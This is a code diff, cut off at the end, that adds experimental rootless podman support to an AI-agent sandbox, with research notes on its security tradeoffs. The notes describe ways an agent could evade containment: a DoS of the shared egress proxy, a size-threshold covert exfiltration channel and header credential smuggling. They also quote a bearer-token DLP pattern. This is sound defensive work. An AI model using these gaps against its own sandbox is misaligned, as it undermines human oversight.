diff --git a/README.md b/README.md index 557bd44..8488716 100644 --- a/README.md +++ b/README.md @@ -75,6 +75,22 @@ On compatible macOS hosts, the default backend requires Apple's `container` CLI Use `BOT_BOTTLE_BACKEND=docker ./cli.py start ` on hosts where neither Apple Container nor KVM is available and Docker is the desired backend. +> **Experimental containers-in-bottle spike (#392):** a bottle may set +> `docker_access: true`. On the macOS backend this starts a guest-local, +> rootless **podman** service after the bottle is registered, exposing its +> Docker-compatible API socket — the agent still uses `docker` and `docker +> compose`. It does not mount Docker Desktop's socket or add outer VM +> capabilities. Rootless Docker was tried first and does not work here at +> all: Apple Container's capability bounding set omits `CAP_SYS_ADMIN`, +> which the kernel requires to write a multi-range `uid_map`. See +> [`docs/research/rootless-docker-in-apple-container-spike.md`](docs/research/rootless-docker-in-apple-container-spike.md). +> +> The tradeoff to understand before enabling it: podman avoids that +> requirement by falling back to a single-UID mapping, so nested containers +> provide **no isolation from the agent itself** — `root` inside a nested +> container is the agent user outside it. Nested containers are a build/test +> convenience, not a security boundary. The bottle remains the boundary. + ### Firecracker on Linux On Linux, a KVM-capable host defaults to the Firecracker backend. It needs: diff --git a/bot_bottle/backend/macos_container/bottle_plan.py b/bot_bottle/backend/macos_container/bottle_plan.py index f93a092..d1ea4dd 100644 --- a/bot_bottle/backend/macos_container/bottle_plan.py +++ b/bot_bottle/backend/macos_container/bottle_plan.py @@ -20,6 +20,7 @@ class MacosContainerBottlePlan(BottlePlan): # bottle is registered. See launch.py's stamp for why it lives here and not # only in the exec-time proxy env. identity_token: str = "" + docker_access: bool = False @property def container_name(self) -> str: diff --git a/bot_bottle/backend/macos_container/launch.py b/bot_bottle/backend/macos_container/launch.py index c498130..258d23e 100644 --- a/bot_bottle/backend/macos_container/launch.py +++ b/bot_bottle/backend/macos_container/launch.py @@ -64,6 +64,7 @@ from .gateway_hosts import ( refresh_gateway_host, set_gateway_host, ) +from . import rootless_podman from .bottle_plan import MacosContainerBottlePlan from ...orchestrator.config_store import resolve_teardown_timeout from .consolidated_launch import ( @@ -171,6 +172,10 @@ def launch( # token above, so — unlike the run-time env — the plan CAN carry it. plan = dataclasses.replace(plan, identity_token=ctx.identity_token) + exec_env = { + **_identity_proxy_env(endpoint, ctx.identity_token), + **rootless_podman.guest_env(plan.docker_access), + } bottle = MacosContainerBottle( plan.container_name, teardown, @@ -184,10 +189,16 @@ def launch( ), terminal_color=plan.spec.color, agent_workdir=plan.workspace_plan.workdir, - exec_env=_identity_proxy_env(endpoint, ctx.identity_token), + exec_env=exec_env, ) bottle.prompt_path = provision(plan, bottle) + if plan.docker_access: + rootless_podman.prepare_guest_devices( + plan.container_name, container_mod.exec_container_as_root, + ) + rootless_podman.start(bottle) + yield bottle finally: teardown() @@ -199,15 +210,22 @@ def _build_images(plan: MacosContainerBottlePlan) -> MacosContainerBottlePlan: committed = read_committed_image(plan.slug) if committed and container_mod.image_exists(committed): info(f"using committed image {committed!r}") - return dataclasses.replace( + plan = dataclasses.replace( plan, agent_provision=dataclasses.replace( plan.agent_provision, image=committed, ), ) - container_mod.build_image( - plan.image, _REPO_DIR, dockerfile=plan.dockerfile_path, - ) + else: + container_mod.build_image( + plan.image, _REPO_DIR, dockerfile=plan.dockerfile_path, + ) + if plan.docker_access: + image = rootless_podman.build_image(plan.image, container_mod.build_image) + plan = dataclasses.replace( + plan, + agent_provision=dataclasses.replace(plan.agent_provision, image=image), + ) return plan diff --git a/bot_bottle/backend/macos_container/resolve_plan.py b/bot_bottle/backend/macos_container/resolve_plan.py index 9a9eb28..6835775 100644 --- a/bot_bottle/backend/macos_container/resolve_plan.py +++ b/bot_bottle/backend/macos_container/resolve_plan.py @@ -44,4 +44,5 @@ def resolve_plan( egress_plan=egress_plan, supervise_plan=supervise_plan, agent_provision=agent_provision_plan, + docker_access=manifest.bottle.docker_access, ) diff --git a/bot_bottle/backend/macos_container/rootless-podman-init.sh b/bot_bottle/backend/macos_container/rootless-podman-init.sh new file mode 100755 index 0000000..8c31233 --- /dev/null +++ b/bot_bottle/backend/macos_container/rootless-podman-init.sh @@ -0,0 +1,89 @@ +#!/bin/sh +set -eu + +uid="$(id -u)" +if [ "$uid" -eq 0 ]; then + echo "refusing to run rootless podman as root" >&2 + exit 1 +fi + +for command in podman docker fuse-overlayfs slirp4netns; do + command -v "$command" >/dev/null 2>&1 || { + echo "missing rootless podman prerequisite: $command" >&2 + exit 1 + } +done + +# The inverse of the rootless-Docker check, and the whole point of the podman +# variant: a subordinate range would push podman onto newuidmap, which cannot +# write a multi-range uid_map without CAP_SYS_ADMIN in this guest. An empty +# range keeps it on the single-UID self-mapping an unprivileged process may +# write itself. +if grep -q "^$(id -un):" /etc/subuid 2>/dev/null; then + echo "unexpected subordinate UID range for $(id -un): podman would" >&2 + echo "require CAP_SYS_ADMIN via newuidmap in this guest" >&2 + exit 1 +fi + +for device in /dev/fuse /dev/net/tun; do + [ -r "$device" ] && [ -w "$device" ] || { + echo "device $device is not readable/writable by $(id -un)" >&2 + exit 1 + } +done + +export XDG_RUNTIME_DIR="${XDG_RUNTIME_DIR:-/tmp/bot-bottle-podman-run}" +config="$HOME/.config/containers" +mkdir -p "$XDG_RUNTIME_DIR" "$config" +chmod 700 "$XDG_RUNTIME_DIR" + +# ignore_chown_errors is required, not incidental: with a single-UID mapping +# there is no second UID for image layers to be chowned to, so layers that +# record other owners would otherwise fail to extract. +cat > "$config/storage.conf" <<'CONF' +[storage] +driver="overlay" +[storage.options.overlay] +mount_program="/usr/bin/fuse-overlayfs" +ignore_chown_errors="true" +CONF + +# No cgroup delegation reaches this guest, so asking podman to manage cgroups +# fails; events_logger=file avoids the journald socket that is equally absent. +cat > "$config/containers.conf" <<'CONF' +[containers] +cgroups="disabled" +[engine] +cgroup_manager="cgroupfs" +events_logger="file" +CONF + +# Registry pulls egress through the bottle's proxy like everything else. The +# token-bearing proxy URL is already in the agent's environment; persisting it +# inside this disposable VM does not broaden its authority. +python3 - <<'PY' +import json +import os +from pathlib import Path + +proxy = os.environ.get("HTTPS_PROXY") or os.environ.get("https_proxy", "") +no_proxy = os.environ.get("NO_PROXY") or os.environ.get("no_proxy", "") +config = {"proxies": {"default": { + "httpProxy": proxy, + "httpsProxy": proxy, + "noProxy": no_proxy, +}}} +path = Path.home() / ".docker" / "config.json" +path.parent.mkdir(parents=True, exist_ok=True) +path.write_text(json.dumps(config), encoding="utf-8") +path.chmod(0o600) +PY + +if docker info >/dev/null 2>&1; then + exit 0 +fi + +log=/tmp/bot-bottle-rootless-podman.log +nohup podman system service --time=0 \ + "unix://$XDG_RUNTIME_DIR/podman.sock" \ + >"$log" 2>&1 str: + """Layer spike-only tooling on an already-built provider image.""" + image = f"{base_image}-rootless-podman" + init_script = Path(__file__).with_name("rootless-podman-init.sh") + with tempfile.TemporaryDirectory(prefix="bot-bottle-rootless-podman.") as tmp: + context = Path(tmp) + shutil.copy2(init_script, context / "rootless-podman-init.sh") + (context / "Dockerfile").write_text( + "FROM docker:28-cli AS docker_cli\n" + f"FROM {base_image}\n" + "USER root\n" + "COPY --from=docker_cli /usr/local/bin/docker /usr/local/bin/docker\n" + "COPY --from=docker_cli /usr/local/libexec/docker/cli-plugins/" + "docker-compose /usr/local/libexec/docker/cli-plugins/docker-compose\n" + "RUN apt-get update \\\n" + " && apt-get install -y --no-install-recommends podman " + "fuse-overlayfs slirp4netns uidmap \\\n" + " && rm -rf /var/lib/apt/lists/* \\\n" + # Deliberate: an empty subordinate range keeps podman on the + # single-UID mapping that needs no CAP_SYS_ADMIN. Adding ranges + # here would reintroduce the newuidmap failure this spike exists + # to route around. + " && sed -i '/^node:/d' /etc/subuid /etc/subgid\n" + "COPY rootless-podman-init.sh " + "/usr/local/libexec/bot-bottle/rootless-podman-init\n" + "RUN chmod 0755 /usr/local/libexec/bot-bottle/rootless-podman-init\n" + "USER node\n", + encoding="utf-8", + ) + build(image, str(context), dockerfile=str(context / "Dockerfile")) + return image + + +def guest_env(enabled: bool) -> dict[str, str]: + """Environment consumed by the Docker CLI inside an enabled bottle.""" + if not enabled: + return {} + return { + "DOCKER_HOST": f"unix://{_SOCKET}", + "XDG_RUNTIME_DIR": _RUNTIME_DIR, + } + + +def prepare_guest_devices(container_name: str, exec_as_root: Callable[..., None]) -> None: + """Make /dev/fuse and /dev/net/tun openable by the agent user. + + Runs as root inside the bottle because the agent must not be able to + re-mode device nodes itself. No outer capability is involved. + """ + exec_as_root( + container_name, + ["sh", "-c", f"chmod 0666 {' '.join(_GUEST_DEVICES)}"], + ) + + +def start(bottle: object) -> None: + """Start and verify the unprivileged service through the bottle exec API.""" + info("starting experimental rootless podman service") + result = bottle.exec(shlex.quote(_INIT)) # type: ignore[attr-defined] + if result.returncode != 0: + detail = (result.stderr or result.stdout or "").strip() + die(f"rootless podman bootstrap failed: {detail or ''}") + + for _ in range(READY_RETRIES): + result = bottle.exec("docker info >/dev/null 2>&1") # type: ignore[attr-defined] + if result.returncode == 0: + info("rootless podman service is ready") + return + time.sleep(0.2) + + logs = bottle.exec( # type: ignore[attr-defined] + f"tail -n 80 {_LOG} 2>/dev/null || true" + ) + die( + "rootless podman did not become ready without additional outer " + f"privileges:\n{(logs.stdout or logs.stderr or '').strip()}" + ) + + +__all__ = ["build_image", "guest_env", "prepare_guest_devices", "start"] diff --git a/bot_bottle/manifest_bottle.py b/bot_bottle/manifest_bottle.py index 8d47c6b..150032a 100644 --- a/bot_bottle/manifest_bottle.py +++ b/bot_bottle/manifest_bottle.py @@ -44,6 +44,9 @@ class ManifestBottle: # daemon that exposes egress MCP tools to the agent. Set # `supervise: false` to skip the gateway. supervise: bool = True + # Experimental guest-local container engine (issue #392). Backends must + # implement this without granting access to a host/shared daemon. + docker_access: bool = False @classmethod def from_dict(cls, name: str, raw: object) -> "ManifestBottle": @@ -123,7 +126,15 @@ class ManifestBottle: f"(was {type(supervise_raw).__name__})" ) + docker_access_raw = d.get("docker_access", False) + if not isinstance(docker_access_raw, bool): + raise ManifestError( + f"bottle '{name}' docker_access must be a boolean " + f"(was {type(docker_access_raw).__name__})" + ) + return cls( env=env, agent_provider=agent_provider, git=git, git_user=git_user, egress=egress, supervise=supervise_raw, + docker_access=docker_access_raw, ) diff --git a/bot_bottle/manifest_extends.py b/bot_bottle/manifest_extends.py index 28911e0..3417b2c 100644 --- a/bot_bottle/manifest_extends.py +++ b/bot_bottle/manifest_extends.py @@ -54,6 +54,7 @@ def _merge_two_bottles_runtime(base: "ManifestBottle", override: "ManifestBottle git_user=merged_git_user, egress=merged_egress, supervise=override.supervise, + docker_access=override.docker_access, ) @@ -206,6 +207,7 @@ def _fold_two_bottles( git_user=merged_git_user, egress=merged_egress, supervise=later.supervise, + docker_access=later.docker_access, ), merged_repos_raw @@ -266,6 +268,11 @@ def _merge_bottles( merged_supervise = ( child.supervise if "supervise" in child_raw else parent.supervise ) + merged_docker_access = ( + child.docker_access + if "docker_access" in child_raw + else parent.docker_access + ) validate_egress_routes(name, merged_egress.routes) return ManifestBottle( @@ -275,6 +282,7 @@ def _merge_bottles( git_user=merged_git_user, egress=merged_egress, supervise=merged_supervise, + docker_access=merged_docker_access, ) diff --git a/bot_bottle/manifest_schema.py b/bot_bottle/manifest_schema.py index 3e292b2..e8f3cb4 100644 --- a/bot_bottle/manifest_schema.py +++ b/bot_bottle/manifest_schema.py @@ -16,7 +16,10 @@ _FILENAME_RX = re.compile(r"^[a-z][a-z0-9-]*$") # sets dies with a "did you mean" pointer: typos should not silently # ghost into an empty config. BOTTLE_KEYS = frozenset( - {"env", "extends", "agent_provider", "git-gate", "egress", "supervise"} + { + "env", "extends", "agent_provider", "git-gate", "egress", "supervise", + "docker_access", + } ) AGENT_KEYS_REQUIRED: frozenset[str] = frozenset() AGENT_KEYS_OPTIONAL = frozenset({"bottle", "skills", "git-gate"}) diff --git a/docs/research/egress-proxy-oom-on-large-downloads.md b/docs/research/egress-proxy-oom-on-large-downloads.md new file mode 100644 index 0000000..1c0ae25 --- /dev/null +++ b/docs/research/egress-proxy-oom-on-large-downloads.md @@ -0,0 +1,86 @@ +# Egress proxy OOMs on large downloads + +Found on 2026-07-21 while running the rootless-podman spike +(`docs/research/rootless-docker-in-apple-container-spike.md`). Recorded +rather than fixed — the fix is a security-relevant decision, not a +mechanical patch. + +## Summary + +A single large HTTPS download through the gateway kills the egress +proxy. `mitmdump` buffers whole response bodies so the DLP detectors can +scan them, grows past the gateway container's memory limit, and is +OOM-killed by the cgroup. Nothing restarts it. + +Two properties make this worse than a failed download: + +- **The gateway is a per-host singleton.** Every bottle shares it, so + one bottle's download takes egress away from all of them. +- **There is no restart on death.** The gateway supervisor is + `while : ; do wait ; done`; a killed daemon stays dead until the infra + container is recreated. + +So ordinary agent activity — pulling a container image, downloading a +model or dataset, fetching a large tarball — is a denial of service +against every other bottle on the host. No malice required, though it is +trivially reachable on purpose. + +## Evidence + +Triggered by `docker compose up` pulling `quay.io/fedora/python-312` +(two layers, ~82MB and ~83MB) inside a bottle. The pull itself +succeeded; the *next* request failed: + +``` +initializing source docker://quay.io/fedora/python-312:latest: + pinging container registry quay.io: Get "https://quay.io/v2/": + proxyconnect tcp: dial tcp 192.168.128.39:9099: connect: connection refused +``` + +From the gateway's `dmesg`: + +``` +python3 invoked oom-killer: gfp_mask=0x100cca(GFP_HIGHUSER_MOVABLE), order=0 +oom-kill:constraint=CONSTRAINT_MEMCG, + oom_memcg=/container/bot-bottle-mac-infra, + task_memcg=/container/bot-bottle-mac-infra,task=mitmdump,pid=118 +Memory cgroup out of memory: Killed process 118 (mitmdump) + total-vm:1391936kB, anon-rss:997768kB +``` + +~1GB RSS against a 1024MB container. Note the amplification: ~165MB of +layers produced ~1GB of resident memory, so the buffering is several +copies deep (encoded body, decoded body, and the text conversion the +regex detectors scan). + +Afterwards the gateway container was still running and healthy-looking — +orchestrator, supervise, and git-http all alive — with no `mitmdump` +process at all, and it stayed that way until the container was +recreated. A liveness check on the container would not have caught this. + +## Reproduction + +1. Launch any bottle with an egress route to a host serving a large file. +2. Download >~150MB over HTTPS through the proxy. +3. `dmesg | grep -i oom` inside `bot-bottle-mac-infra`, and note that no + `mitmdump` process remains. + +Beware a false negative when checking: truncating the process listing +(`cut -c1-45`) cuts before the binary name, because `mitmdump` runs as +`/usr/local/bin/python3.12 /usr/local/bin/mitmdump …`. + +## Fix options, not yet chosen + +1. **Restart dead daemons.** Smallest change and strictly an + improvement: an OOM then degrades one download instead of removing + egress for every bottle. Does not stop the OOM. +2. **Cap the scanned body size.** Above a threshold, stop buffering — + either skip the scan or stream it. This is the root-cause fix and a + security decision: a size threshold is exactly the hole an exfiltrator + would aim for, so "skip above N" trades a DoS for a covert channel. + Streaming with a bounded window keeps coverage, at more complexity. +3. **Raise the gateway's memory limit.** Moves the threshold; does not + remove it. + +Worth noting that (1) and (2) are complementary — the restart gap is +worth closing regardless of how the memory behaviour is resolved. diff --git a/docs/research/rootless-docker-in-apple-container-spike.md b/docs/research/rootless-docker-in-apple-container-spike.md new file mode 100644 index 0000000..bee2903 --- /dev/null +++ b/docs/research/rootless-docker-in-apple-container-spike.md @@ -0,0 +1,353 @@ +# Rootless Docker inside Apple Container bottles + +Spike branch: `spike/rootless-docker-macos` (`a4d8461`) + +## Summary + +**Negative result.** Rootless Docker cannot run inside an Apple +Container bottle without granting the bottle `CAP_SYS_ADMIN`. This is a +kernel constraint on writing multi-range `uid_map`, not a packaging gap +we can close with a better init script, a different base image, or more +careful `/etc/subuid` handling. + +The spike was built on the premise — stated in +`bot_bottle/backend/macos_container/rootless_docker.py` — that it would +*"deliberately refuse to compensate for missing prerequisites with outer +capabilities, a privileged container, or a host Docker socket."* That +premise is exactly what the experiment falsified. The two ways forward +are to abandon the premise (add `CAP_SYS_ADMIN` to the bottle, and with +it most of the isolation the bottle exists to provide) or to abandon +rootless Docker. + +Recommendation: abandon rootless Docker. Podman does not have this +problem — see [Podman is not blocked by +this](#podman-is-not-blocked-by-this) below. + +## Local environment + +Tested on 2026-07-21: + +```console +$ sw_vers +ProductName: macOS +ProductVersion: 26.5.1 +BuildVersion: 25F80 + +$ container --version +container CLI version 1.0.0 (build: release, commit: ee848e3) + +$ uname -a # inside the bottle +Linux ... 6.18.15 #1 SMP Tue Mar 17 01:36:53 UTC 2026 aarch64 GNU/Linux +``` + +## The failure + +`tests/integration/test_macos_rootless_docker_spike.py` builds the +image, launches the bottle, and dies in `rootless_docker.start`: + +``` ++ exec rootlesskit --net=slirp4netns --mtu=65520 ... dockerd-rootless.sh +[rootlesskit:parent] error: failed to setup UID/GID map: + newuidmap 1100 [0 1000 1 1 100000 65536] failed: + newuidmap: write to uid_map failed: Operation not permitted +``` + +## Why it fails + +Every prerequisite you would normally suspect is present and correct in +the guest: + +| Check | Result | +| --- | --- | +| `/usr/bin/newuidmap` | `-rwsr-xr-x root root` — setuid bit intact, survived the OCI export | +| `/` mount options | `rw,relatime` — **not** `nosuid` | +| `NoNewPrivs` | `0` | +| `Seccomp` | `0`, no filters | +| `/etc/subuid`, `/etc/subgid` | `node:100000:65536` in both | +| user namespace | `user:[4026531837]`, identical to pid 1 — the *initial* userns | +| `unshare -U -r true` | succeeds | +| `/proc/sys/user/max_user_namespaces` | `4505` | + +The one thing that is missing is in the capability bounding set that +Apple Container gives the container: + +``` +CapBnd: 00000000a80425fb += chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, + net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap +``` + +No `CAP_SYS_ADMIN`. That is the whole story, and the chain is: + +1. The kernel's `map_write()` gates writing a `uid_map` on + `file_ns_capable(file, ns, CAP_SYS_ADMIN)` — capability over the + **new** user namespace, evaluated against the credentials that opened + `/proc//uid_map`. +2. `newuidmap` is setuid-root, so it runs with euid 0 — but its + capability sets are clamped by the bounding set, which has no + `CAP_SYS_ADMIN`. +3. `cap_capable()` has a shortcut that grants *all* capabilities when + the caller's userns is the new namespace's parent **and** + `ns->owner == cred->euid`. It does not apply: the namespace was + created by `node` (uid 1000) while `newuidmap` runs as euid 0. +4. So the check falls through to the effective-set test in the initial + userns, which fails. `EPERM`. + +Note that the single-line unprivileged path (`unshare -U -r`) works +precisely because it does not go through `newuidmap` and does not need +`CAP_SYS_ADMIN`. Only the multi-range subuid mapping that rootless +Docker requires does. + +This is the same constraint that makes upstream's `dind-rootless` image +require `--privileged`. It is not specific to Apple Container, except +that Apple Container gives us no bounding set that includes +`CAP_SYS_ADMIN` by default. + +## It does work with the capability — which is the point + +Adding the capability clears the failure immediately, and exposes one +further, much smaller blocker: `/dev/net/tun` exists (the kernel has +tun; `/proc/misc` lists `200 tun`) but Apple Container creates it +`crw------- root root`, so uid 1000 cannot open it and `slirp4netns` +fails with `open: Permission denied`. A `chmod 0666 /dev/net/tun` as +root inside the bottle fixes that, and needs no capability beyond what +the bottle already has. + +With both applied by hand, the daemon comes up completely: + +```console +$ container run --rm -u root --cap-add CAP_SYS_ADMIN \ + bot-bottle-claude:latest-rootless-docker sh -c '...' +Server Version: 20.10.24+dfsg1 +Storage Driver: fuse-overlayfs +Cgroup Driver: none +Cgroup Version: 2 +API listen on /tmp/rt/docker.sock +``` + +So `rootless-docker-init.sh` and `rootless_docker.py` are *correct*. +The spike did not fail on a bug. It failed on its own premise. + +Two secondary findings from that run, relevant if anyone revisits this: + +- Debian's `docker.io` package pins Docker **20.10** (EOL), not the 28.x + implied by the `docker:28-cli` compose plugin the image copies in. +- `Cgroup Driver: none` — no resource limits on nested containers. + +## Why we should not just add the capability + +`CAP_SYS_ADMIN` is close to a superset of "root" in practical terms — +mount, `pivot_root`, namespace manipulation, and a long tail of +subsystem-specific powers. Granting it to the agent bottle would +undercut the containment argument the rest of the backend is built +around, including the deliberately narrow choices immediately adjacent +to it in `launch.py` (`--cap-drop CAP_NET_RAW`, no `NET_ADMIN`, a +host-only agent network). Trading all of that for nested `docker +compose` is a bad exchange. + +## Podman is not blocked by this + +Sanity-checked on the same host, same kernel, same runtime, so the +comparison is apples to apples: + +| Scenario | Result | +| --- | --- | +| Podman rootless, `/etc/subuid` populated | **Fails identically** — `newuidmap: write to uid_map failed: Operation not permitted` | +| Podman rootless, no subuid ranges, `--network=host` | **Works**, no added capabilities | +| Podman rootless, no subuid ranges, default netns, `/dev/net/tun` at `0600` | Fails — `slirp4netns: open("/dev/net/tun"): Permission denied` | +| Podman rootless, no subuid ranges, default netns, `/dev/net/tun` at `0666` | **Works**, no added capabilities | + +The difference is that podman degrades gracefully when no subuid range +is available: it falls back to a single-UID self-mapping, which an +unprivileged process may write itself, so `newuidmap` is never invoked +and `CAP_SYS_ADMIN` is never needed. Docker's rootless mode has no +equivalent fallback. + +The cost of that fallback is real and should be weighed before building +on it: with a single-UID mapping, every UID inside a nested container +collapses onto the bottle's own uid 1000. There is no UID separation +between the agent and anything it runs — `root` in a nested container is +the agent user outside it. It also requires `ignore_chown_errors` on the +storage driver. Whether that is acceptable depends on whether the bottle +boundary (which is unchanged) or the nested-container boundary (which is +effectively nil) is the one we are relying on. + +## What the podman spike then needed + +The podman implementation that replaced the Docker one on this branch +turned up two more device-node blockers of the same shape as +`/dev/net/tun` — Apple Container creates the node, but 0600 root:root: + +- **`/dev/fuse`** — blocks the `fuse-overlayfs` storage driver + (`fuse: failed to open /dev/fuse: Permission denied`). Without it the + only working driver is `vfs`, which copies whole layers per container. +- **`/dev/net/tun`** — blocks `slirp4netns`, which rootless podman uses + for the default bridge network. + +Both are fixed by `chmod 0666` as root inside the bottle, which needs no +capability the bottle does not already hold. This is categorically +different from the `CAP_SYS_ADMIN` requirement: it is a permission on a +node that already exists, not an outer privilege grant. + +One design note worth recording: the agent-facing surface stays `docker` +and `docker compose`, pointed at podman's Docker-compatible API socket +via `DOCKER_HOST`. Setting `netns="host"` in `containers.conf` does *not* +propagate through that compat API — stock `docker run` and compose files +request bridge networking explicitly — so slirp4netns (and therefore the +`/dev/net/tun` chmod) is required for ordinary compose files to work at +all. Host networking remains available per-workload via +`--network=host`. + +Verified working in a bottle with zero added capabilities: fuse-overlayfs +storage, the compat API socket, `docker run` on both bridge and host +networking, and published ports. + +### Nested pulls collide with our own egress DLP + +The first live run got podman up and `docker compose` running, then +failed on the image pull: + +``` +web Pulling +initializing source docker://python:3.12-alpine: reading manifest ... +StatusCode: 403, egress DLP: Generic Bearer JWT found in body +``` + +This is bot-bottle's own egress scanner, not a podman problem. The +Docker registry auth flow carries a bearer JWT *by protocol*, and the +`token_patterns` detector's `Generic Bearer JWT` rule +(`Bearer\s+[A-Za-z0-9._\-]{50,}`) matches it on every pull. Any bottle +that pulls images will hit this. + +The fix is per-route detector scoping, which the egress config already +supports — drop `token_patterns` on the registry hosts and keep +`known_secrets`: + +```json +{"host": "registry-1.docker.io", + "dlp": {"outbound_detectors": ["known_secrets"]}} +``` + +That is the right trade rather than a grudging one: `known_secrets` +matches the bottle's *actual* credential values, so real exfil through a +registry host is still caught. `token_patterns` on a registry route only +ever produces protocol noise. + +Worth generalising later: any manifest enabling `docker_access` needs +this on its registry routes, so it probably belongs in a shared +registry-route snippet rather than being copy-pasted per bottle. + +### And then registry auth collides with the Authorization strip + +With DLP scoped, the pull failed differently: `unauthorized: +authentication required`. This one is architectural. + +`egress_addon.py` strips agent-set `Authorization` unconditionally +before forwarding — deliberately, so an agent cannot smuggle a +credential out in a header the DLP detectors don't recognise. A route +may carry gateway-injected auth instead, but only from a *static* token +in an env var (`auth_scheme` + `token_env`). + +Docker registry auth doesn't fit that shape. The client fetches a +short-lived, per-repository-scope bearer token from `auth.docker.io` and +presents it to `registry-1.docker.io`. There is no static token to +inject, and the token the client legitimately obtained is stripped. + +Measured inside a bottle, by hand: + +| Step | Result | +| --- | --- | +| Fetch token from `auth.docker.io` | 200, 5409-byte token body | +| Manifest request **with** that valid token | 401 | +| Manifest request with **no** Authorization | 401 — identical | + +A valid token behaves exactly like sending none, which is direct +evidence the header never arrives. Any nested-container workflow that +pulls from a registry is blocked on this, so it is not a detail that can +be deferred: pulling base images is most of what nested containers are +for. + +### Registries that skip the token dance work today + +Not every registry needs the stripped header. Measured directly: + +| Registry | Manifest request with no `Authorization` | +| --- | --- | +| `quay.io` | 200 | +| `mcr.microsoft.com` | 200 | +| `registry.k8s.io` | 307 (redirect, no auth) | +| `ghcr.io` | 401 | +| `registry-1.docker.io` | 401 | + +So "just add the registry to the bottle config" genuinely works — for +quay, MCR, registry.k8s.io, or any unauthenticated internal registry. +Docker Hub and GHCR are the ones that need the strip resolved. The +acceptance test uses quay for exactly this reason. + +Resolving it for Docker Hub means picking one of: + +1. **Per-route opt-in to preserve client Authorization.** Smallest + change. Note the compounding effect on exactly these routes: the DLP + scoping above already removed `token_patterns` there, so a + preserved-auth registry route is one where the agent may send bearer + tokens that neither the strip nor the pattern detector inspects. + `known_secrets` still applies, so the bottle's real credentials are + still caught. +2. **A registry-aware gateway** that performs the token dance itself and + injects the result. Preserves the invariant fully; materially more + work, and it makes the gateway speak a specific registry protocol. +3. **Pre-seed images at provision time** (host-side `container image + save` into podman storage), so bottles never pull at runtime. + Preserves the invariant, and limits nested containers to + pre-approved images — which fits the custody positioning, at the cost + of no ad-hoc `docker pull`. +4. **Stop.** Nested containers are not supported on this backend. + +### Podman 4.3.1 silently swallows container exit codes + +Debian bookworm — which the current agent base image is built on — +ships podman 4.3.1. Through its Docker-compatible API, `docker run` +returns 0 no matter what the container did: + +| Command | podman 4.3.1 | podman 5.4.2 | +| --- | --- | --- | +| `docker run … sh -c 'exit 7'` (compat API) | **0** | 7 | +| `docker run … sh -c 'exit 0'` (compat API) | 0 | 0 | +| `podman run … sh -c 'exit 7'` (native) | 7 | 7 | + +This is worse than a broken feature: every failing command an agent runs +via `docker run` reports success. A test suite, a build step, or a CI +script inside a bottle would pass while failing. It also silently +defeated the acceptance test's egress-containment assertion, which is +why that assertion now checks an in-band marker rather than an exit +code. + +Podman 5.4.2 (Debian trixie) fixes it, but needs two packages that +bookworm's podman does not: `passt` (podman 5's default network tool) +and `nftables` (netavark shells out to `nft`; without it every run fails +with `unable to upgrade to tcp, received 500`). With both installed, +exit codes propagate correctly and the compat API behaves. + +The open question this leaves is where podman 5 comes from, since the +agent base is bookworm-based: + +1. **Move the agent images to Debian trixie.** Trixie is current stable. + Correct, and the blast radius is every bottle, not just this feature. +2. **Drop the compat socket and use podman natively** (`podman-docker` + provides a `docker` shim; compose comes from `podman-compose`). + Native podman propagates exit codes correctly even on 4.3.1. Contained + to this feature, at the cost of `docker compose` becoming + `docker-compose`/`podman-compose`. +3. **Ship bookworm's podman 4.3.1 with the compat socket** — not viable. + Silent false success is a correctness bug agents cannot see. + +## Recommendation + +1. Do not revive rootless Docker on this backend. This document is the + record of why. +2. Nested containers, if wanted, come from podman under the + single-mapping constraint — with the explicit understanding that the + nested-container boundary carries no security weight. `root` in a + nested container is the agent user outside it. +3. Nested containers are therefore a build/test convenience. The bottle + remains the security boundary, exactly as it was. diff --git a/tests/integration/test_macos_rootless_podman_spike.py b/tests/integration/test_macos_rootless_podman_spike.py new file mode 100644 index 0000000..37dfc0f --- /dev/null +++ b/tests/integration/test_macos_rootless_podman_spike.py @@ -0,0 +1,154 @@ +"""Live-Mac acceptance spike for guest-local rootless podman (issue #392). + +Run explicitly on an Apple Silicon/macOS 26 host: + + BOT_BOTTLE_ROOTLESS_PODMAN_SPIKE=1 \ + python3 -m unittest tests.integration.test_macos_rootless_podman_spike -v + +The opt-in is deliberate: ordinary Linux CI cannot execute Apple Container. + +Podman rather than Docker because Apple Container's capability bounding set +omits CAP_SYS_ADMIN; see +docs/research/rootless-docker-in-apple-container-spike.md. The agent-facing +surface is still `docker` and `docker compose`, which talk to podman's +Docker-compatible API socket. +""" + +from __future__ import annotations + +import os +import platform +import shutil +import tempfile +import unittest +from pathlib import Path + +from bot_bottle.backend import BottleSpec, get_bottle_backend +from bot_bottle.manifest import ManifestIndex + + +@unittest.skipUnless( + platform.system() == "Darwin" + and os.environ.get("BOT_BOTTLE_ROOTLESS_PODMAN_SPIKE") == "1", + "requires an explicit live-Mac rootless-podman spike run", +) +class TestMacosRootlessPodmanSpike(unittest.TestCase): + def test_compose_stays_inside_registered_bottle(self) -> None: + workspace = Path(tempfile.mkdtemp(prefix="rootless-podman-spike.")) + stage = Path(tempfile.mkdtemp(prefix="rootless-podman-stage.")) + try: + (workspace / "index.html").write_text("bottle-compose-ok\n") + (workspace / "compose.yaml").write_text( + "services:\n" + " web:\n" + " image: quay.io/prometheus/busybox\n" + " working_dir: /workspace\n" + " command: httpd -f -p 8000 -h /workspace\n" + " volumes: ['.:/workspace']\n" + " ports: ['18080:8000']\n", + encoding="utf-8", + ) + manifest = ManifestIndex.from_json_obj({ + "bottles": {"dev": { + "docker_access": True, + # A deliberately tiny image. Pulling a ~165MB one + # OOM-kills the shared egress proxy, which buffers whole + # response bodies to scan them — a real defect, but a + # separate one from what this test covers. See the + # research note. + # + # quay.io deliberately, not Docker Hub: the egress proxy + # strips agent-set Authorization (so an agent cannot + # smuggle a credential out in a header), and Docker Hub + # requires a client-fetched, per-scope bearer token that + # the strip therefore removes. quay serves manifests with + # no Authorization at all, so a plain route is enough. + # + # token_patterns is still scoped off: registry traffic + # carries bearer JWTs by protocol and trips the generic + # rule. known_secrets stays on — it matches the bottle's + # own credentials, which is the detector that catches + # real exfil. + "egress": {"routes": [ + {"host": "quay.io", "dlp": { + "outbound_detectors": ["known_secrets"], + }}, + {"host": "cdn01.quay.io", "dlp": { + "outbound_detectors": ["known_secrets"], + }}, + ]}, + }}, + "agents": {"spike": { + "bottle": "dev", "skills": [], "prompt": "", + }}, + }) + spec = BottleSpec( + manifest=manifest, + agent_name="spike", + 